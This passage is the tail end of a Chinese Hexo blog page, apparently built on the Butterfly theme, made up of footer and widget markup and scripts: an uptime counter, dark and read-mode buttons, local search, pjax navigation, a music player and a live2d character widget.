Date,i=o.getFullYear(),a=o.getMonth()+1,n=o.getDate(),r=o.getHours(),l=o.getMinutes(),s=o.getSeconds(),M=Date.UTC(2020,10,4,9,0,0),g=Date.UTC(i,a,n,r,l,s)-M,m=Math.floor(g/31536e6),T=Math.floor(g/t-365*m),f=Math.floor((g-(365*m+T)*t)/e),h=Math.floor((g-(365*m+T)*t-f*e)/6e4),u=Math.floor((g-(365*m+T)*t-f*e-6e4*h)/1e3);document.getElementById("sitetime").innerHTML="小破站已在各种灾难中苟活"+m+" 年 "+T+" 天 "+f+" 小时 "+h+" 分钟 "+u+" 秒"}siteTime()</script></body></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/wzpan/hexo-generator-search" style="color:#49b1f5">hexo-generator-search</a> <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="/js/search/local-search.js"></script><script>var preloader = {
  endLoading: () => {
    document.body.style.overflow = 'auto';
    document.getElementById('loading-box').classList.add("loaded")
  },
  initLoading: () => {
    document.body.style.overflow = '';
    document.getElementById('loading-box').classList.remove("loaded")

  }
}
window.addEventListener('load',()=> {preloader.endLoading()})</script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script src="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful=!0,POWERMODE.shake=!0,POWERMODE.mobile=!1,document.body.addEventListener("input",POWERMODE)</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = [
  'title',
  '#config_change',
  '#body-wrap',
  '#rightside-config-hide',
  '#rightside-config-show',
  '.js-pjax'
]

if (false) {
  pjaxSelectors.unshift('meta[property="og:image"]', 'meta[property="og:title"]', 'meta[property="og:url"]')
}

var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()
  window.foot_tm()
  
  $('script[data-pjax]').each(function () {
    $(this).parent().append($(this).remove())
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof chatBtnFn === 'function' && chatBtnFn()
  typeof panguInit === 'function' && panguInit()

  if (typeof gtag === 'function') {
    gtag('config', '', {'page_path': window.location.pathname});
  }

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // Analytics
  if (false) {
    MtaH5.pgv()
  }

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()

  typeof preloader === 'object' && preloader.endLoading()
})


document.addEventListener('pjax:send', function () {
  typeof preloader === 'object' && preloader.initLoading()
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  $(window).off('scroll')

  //reset readmode
  $('body').hasClass('read-mode') && $('body').removeClass('read-mode')

})</script></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({pluginRootPath:"live2dw/",pluginJsPath:"lib/",pluginModelPath:"assets/",tagMode:!1,debug:!1,model:{scale:1,hHeadPos:.5,vHeadPos:.618,jsonPath:"/live2dw/assets/haruto.model.json"},display:{superSample:2,position:"right",width:150,height:300,hOffset:20,vOffset:-90},mobile:{show:!0,scale:1},react:{opacityDefault:.3,opacityOnHover:.3,opacity:.95},log:!1})</script></body></html>